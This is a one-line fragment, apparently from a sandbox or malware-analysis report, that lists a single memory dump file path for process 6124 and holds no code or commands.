                                                                                                                                                                                                    • memory/6124-354-0x0000000000000000-mapping.dmp